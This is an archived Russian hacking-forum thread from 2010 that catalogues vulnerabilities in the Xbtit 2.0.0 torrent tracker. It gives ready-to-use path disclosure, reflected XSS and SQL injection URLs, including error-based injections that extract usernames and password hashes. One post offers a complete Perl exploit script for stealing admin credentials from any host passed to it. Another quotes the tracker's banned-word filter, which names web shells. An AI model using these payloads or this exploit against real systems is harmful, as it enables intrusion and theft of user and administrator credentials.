Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Уязвимости Xbtit

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Уязвимости Xbtit
Имя
Сообщение << Старые топики   Новые топики >>
Уязвимости Xbtit - 2010-03-13 20:35:42.526666   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Xbtit 2.0.0

Спасибо всем кто помагал. Моего труда здесь вообще мало.

Раскрытие путей.
http://target.com/index.php?page=signup&act=signup&returnto[]= Ещё
PHPSESSID=!@#$%^&*(
Если создан хоть один топик в форуме


index.php?page=forum&action=viewforum&forumid[]= index.php?page=forum&action=viewtopic&topicid[]=
/ajaxchat/sendChatData.php

Уязвимый кусок кода:

if (!ini_get('register_globals')) { extract($_POST, EXTR_SKIP); } $name = $n; # name from the form $text = $c; # comment from the form $uid = $u; # userid from the form


Если не найден $_GET $_POST $_COOKIE n или c или u, выскакивает Notice, мол, переменная не найдена.

quote:

index.php?page=users&searchtext[]=

/index.php?page=allshout&sid[]=1


Пассивная XSS

quote:

http://target.com//"&gt;&lt;script&gt;alert(/XSS/);&lt;/script&gt;
/index.php?page=edit&info_hash=HASHID&returnto=index.php";alert(/hello+world/);&lt;!–


SQL Injection.

Требуются права админа
index.php?page=admin&user=2&code=8355071'&do=pruneu
Наврал , права пользователя нужны
index.php?page=allshout&sid=1'&edit
index.php?page=allshout&sid=1'&delete
index.php?page=allshout&sid=1+and+substring(version(),1,1)=5/*&edit
/ajaxchat/sendChatData.php?n=123\&c=,concat_ws(0x3a,user(),database(),version()),7)/*&u=2
Если не работает GET'ом, попробуйте POST'ом
/ajaxchat/sendChatData.php?n=NAME\&c=,concat_ws(0x3a,user(),database(),version()),2)/*&u=2
/index.php?page=admin&user=2&code=134469&do=category&action=edit&id=5 and substring(version(),1)=5 (Blind SQL-инъекция. Необходимы права админа.)
/index.php?page=admin&user=2&code=134469&do=style&action=edit&id=1+and+substring(version(),1)=5 (Blind SQL-инъекция. Необходимы права админа.)

Ну и собственно вот скуля есть, не блинд.

quote:

/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((SELECT+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–++&by=ASC


Постинг в чат от другого юзера:
quote:

ajaxchat/sendChatData.php?n=NAME&c=TEXT&u=UID

Если register_globals = On - GET'ом открывать, в противном случае - POST'ом.

Спасибо большое HAXTA4OK, mailbrush.
Post #: 1
RE: Уязвимости Xbtit - 2010-03-23 20:37:56.110000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
В журнале писали о багах (ктото с ачата)
Но в общем неплохо)
Post #: 2
RE: Уязвимости Xbtit - 2010-03-24 05:28:33.376666   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Да собственно баги не новые, просто вот это
quote:

/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((SELECT+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–++&by=ASC

Новая бага как бы =\

// Здесь как то посты удалять можно?
Post #: 3
RE: Уязвимости Xbtit - 2010-03-24 13:39:00.913333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

/ Здесь как то посты удалять можно?

мне напиши, я удалю
Post #: 4
RE: Уязвимости Xbtit - 2010-03-28 10:17:24.460000   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Нашёл ещё.

/index.php?page=torrents&active=2&order=speed+or(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–++&by=ASC

order=speed обязательно speed ;)

И по традиции сплойт.
#!/usr/bin/perl use LWP::Simple; print "\n"; print "##############################################################\n"; print "# xbtit Torrent Tracker SQL INJECTION EXPLOIT #\n"; print "# Author: Ctacok (Russian) #\n"; print "# Blog : www.Ctacok.ru #\n"; print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n"; print "# Hello HAXTA4OK, mailbrush (Thanks) #\n"; print "##############################################################\n"; if (@ARGV &lt; 2) { print "\n Usage: exploit.pl [host] [path] "; print "\n EX : exploit.pl www.localhost.com /path/ \n\n"; exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vuln = "+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)"; $doc = get($host.$path."index.php?page=torrents&active=2&order=speed".$vuln."--+&by=ASC"); if ($doc =~ /:::(.+):(.+):(.+):::/){ print "\n[+] Admin id: : $1"; print "\n[+] Admin username: $2"; print "\n[+] Admin password: $3"; }else{ print "\n My name is Fail, Epic Fail... \n" }
Надо что-бы торренты были открыты, без авторизации что бы можно было смотреть торренты :)
Post #: 5
RE: Уязвимости Xbtit - 2010-03-31 21:25:48.800000   
kazrulit

Сообщений: 79
Оценки: 0
Присоединился: 2009-07-22 14:23:31.770000
Там вроде стоит фильтр. Если там <script> или там union select у них там в админке как hacking attempt выйдет.
Post #: 6
RE: Уязвимости Xbtit - 2010-04-01 04:36:27.896666   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
quote:

//the bad words…
$ban['union']='select';
//$ban['update']='set';
$ban['set password for']='@';

$ban2=array('delete from','insert into','&lt;script', '&lt;object', '.write', '.location', '.cookie', '.open', 'vbscript:', '&lt;iframe', '&lt;layer', '&lt;style', ':expression', '&lt;base', 'id_level', 'users_level', 'xbt_', 'c99.txt', 'c99shell', 'r57.txt', 'r57shell.txt','/home/', '/var/', '/www/', '/etc/', '/bin', '/sbin/', '$_GET', '$_POST', '$_REQUEST', 'window.open', 'javascript:', 'xp_cmdshell', '.htpasswd', '.htaccess', '&lt;?php', '&lt;?', '?&gt;', '&lt;/script&gt;');


Ну в скулях там union ненужен собственно, а шелленг заливаеться через SMF к примеру.
Post #: 7
RE: Уязвимости Xbtit - 2010-04-01 04:46:31.290000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
quote:

'c99.txt', 'c99shell', 'r57.txt', 'r57shell.txt'


[sm=ag.gif][sm=ag.gif][sm=ag.gif]
Post #: 8
RE: Уязвимости Xbtit - 2010-04-01 17:52:52.770000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333

quote:

ORIGINAL: Pashkela

quote:

'c99.txt', 'c99shell', 'r57.txt', 'r57shell.txt'


[sm=ag.gif][sm=ag.gif][sm=ag.gif]

Ага, привет кулхацкерам)))))000
Post #: 9
Страниц:  [1]
Все форумы >> [Уязвимости] >> Уязвимости Xbtit







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.